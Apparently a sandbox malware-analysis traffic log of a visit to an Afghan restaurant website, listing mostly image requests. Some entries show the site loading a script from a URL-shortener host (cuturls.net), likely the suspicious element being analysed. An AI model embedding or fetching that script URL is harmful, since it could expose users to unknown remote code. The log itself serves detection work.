Source: global trafficHTTP traffic detected: GET /assets/imgs/special-menu-2.jpg HTTP/1.1Host: www.afghanhayatrestaurant.com.auConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.afghanhayatrestaurant.com.au/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/imgs/back_2.png HTTP/1.1Host: www.afghanhayatrestaurant.com.auConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.afghanhayatrestaurant.com.au/assets/css/custom.cssAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/imgs/Banner_index_image.png HTTP/1.1Host: www.afghanhayatrestaurant.com.auConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.afghanhayatrestaurant.com.au/assets/css/foodhut.cssAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/imgs/featured-image-02.jpg HTTP/1.1Host: www.afghanhayatrestaurant.com.auConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/imgs/featured-image-01.jpg HTTP/1.1Host: www.afghanhayatrestaurant.com.auConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/imgs/featured-image-04.jpg HTTP/1.1Host: www.afghanhayatrestaurant.com.auConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/imgs/featured-image-03.jpg HTTP/1.1Host: www.afghanhayatrestaurant.com.auConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/imgs/special-menu-3.jpg HTTP/1.1Host: www.afghanhayatrestaurant.com.auConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/imgs/special-menu-1.jpg HTTP/1.1Host: www.afghanhayatrestaurant.com.auConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/imgs/special-menu-2.jpg HTTP/1.1Host: www.afghanhayatrestaurant.com.auConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/imgs/back_2.png HTTP/1.1Host: www.afghanhayatrestaurant.com.auConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: www.afghanhayatrestaurant.com.auConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.afghanhayatrestaurant.com.au/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/imgs/Banner_index_image.png HTTP/1.1Host: www.afghanhayatrestaurant.com.auConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: www.afghanhayatrestaurant.com.auConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /dineInMenu HTTP/1.1Host: www.afghanhayatrestaurant.com.auConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/imgs/menu_imges/Chicken_Tikka_Kabab.png HTTP/1.1Host: www.afghanhayatrestaurant.com.auConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.afghanhayatrestaurant.com.au/dineInMenuAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /eWD0j3 HTTP/1.1Host: cuturls.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.afghanhayatrestaurant.com.au/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/imgs/menu_imges/Tikka_Shish_Kabab.png HTTP/1.1Host: www.afghanhayatrestaurant.com.auConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.afghanhayatrestaurant.com.au/dineInMenuAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/imgs/menu_imges/Sekh_Kabab.png HTTP/1.1Host: www.afghanhayatrestaurant.com.auConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.afghanhayatrestaurant.com.au/dineInMenuAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/imgs/menu_imges/Mixed_Kabab_Skewers.png HTTP/1.1Host: www.afghanhayatrestaurant.com.auConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.afghanhayatrestaurant.com.au/dineInMenuAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/imgs/menu_imges/Afghani_Rice_Mix_Kabab.png HTTP/1.1Host: www.afghanhayatrestaurant.com.auConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.afghanhayatrestaurant.com.au/dineInMenuAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/imgs/menu_imges/Kabuli_Pallow.png HTTP/1.1Host: www.afghanhayatrestaurant.com.auConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.afghanhayatrestaurant.com.au/dineInMenuAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/imgs/menu_imges/Biryani_Pallow.png HTTP/1.1Host: www.afghanhayatrestaurant.com.auConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.afghanhayatrestaurant.com.au/dineInMenuAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/imgs/header_5.jpg HTTP/1.1Host: www.afghanhayatrestaurant.com.auConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.afghanhayatrestaurant.com.au/assets/css/custom.cssAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/imgs/menu_imges/Chicken_Tikka_Kabab.png HTTP/1.1Host: www.afghanhayatrestaurant.com.auConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/imgs/menu_imges/Chicken_Korma.png HTTP/1.1Host: www.afghanhayatrestaurant.com.auConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.afghanhayatrestaurant.com.au/dineInMenuAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/imgs/menu_imges/Meat_Ball_Curry.png HTTP/1.1Host: www.afghanhayatrestaurant.com.auConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.afghanhayatrestaurant.com.au/dineInMenuAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /eWD0j3 HTTP/1.1Host: cuturls.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: sid=531b57b9-7fad-11ef-9455-174eec4a577f
Source: global trafficHTTP traffic detected: GET /assets/imgs/menu_imges/Afghani_Rice_Mix_Kabab.png HTTP/1.1Host: www.afghanhayatrestaurant.com.auConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/imgs/menu_imges/Sekh_Kabab.png HTTP/1.1Host: www.afghanhayatrestaurant.com.auConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/imgs/menu_imges/Kabuli_Pallow.png HTTP/1.1Host: www.afghanhayatrestaurant.com.auConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/imgs/menu_imges/Biryani_Pallow.png HTTP/1.1Host: www.afghanhayatrestaurant.com.auConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/imgs/menu_imges/Mixed_Kabab_Skewers.png HTTP/1.1Host: www.afghanhayatrestaurant.com.auConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/imgs/menu_imges/Mantu.png HTTP/1.1Host: www.afghanhayatrestaurant.com.auConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.afghanhayatrestaurant.com.au/dineInMenuAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/imgs/menu_imges/Chapli_Kabab.png HTTP/1.1Host: www.afghanhayatrestaurant.com.auConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.afghanhayatrestaurant.com.au/dineInMenuAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/imgs/menu_imges/Lamb_Karae.png HTTP/1.1Host: www.afghanhayatrestaurant.com.auConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.afghanhayatrestaurant.com.au/dineInMenuAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/imgs/menu_imges/Tikka_Shish_Kabab.png HTTP/1.1Host: www.afghanhayatrestaurant.com.auConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/imgs/menu_imges/Chicken_Karae.png HTTP/1.1Host: www.afghanhayatrestaurant.com.auConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.afghanhayatrestaurant.com.au/dineInMenuAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/imgs/menu_imges/Rice_with_Spinach.png HTTP/1.1Host: www.afghanhayatrestaurant.com.auConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.afghanhayatrestaurant.com.au/dineInMenuAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/imgs/menu_imges/Rice_with_Dhal.png HTTP/1.1Host: www.afghanhayatrestaurant.com.auConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.afghanhayatrestaurant.com.au/dineInMenuAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/imgs/menu_imges/Vegetarian_Ashaak.png HTTP/1.1Host: www.afghanhayatrestaurant.com.auConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.afghanhayatrestaurant.com.au/dineInMenuAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/imgs/menu_imges/Potato_Borani.png HTTP/1.1Host: www.afghanhayatrestaurant.com.auConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.afghanhayatrestaurant.com.au/dineInMenuAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/imgs/menu_imges/Borani_Banjan.png HTTP/1.1Host: www.afghanhayatrestaurant.com.auConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.afghanhayatrestaurant.com.au/dineInMenuAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/imgs/menu_imges/Chicken_Korma.png HTTP/1.1Host: www.afghanhayatrestaurant.com.auConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/imgs/menu_imges/Meat_Ball_Curry.png HTTP/1.1Host: www.afghanhayatrestaurant.com.auConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/imgs/header_5.jpg HTTP/1.1Host: www.afghanhayatrestaurant.com.auConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/imgs/menu_imges/Mantu.png HTTP/1.1Host: www.afghanhayatrestaurant.com.auConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
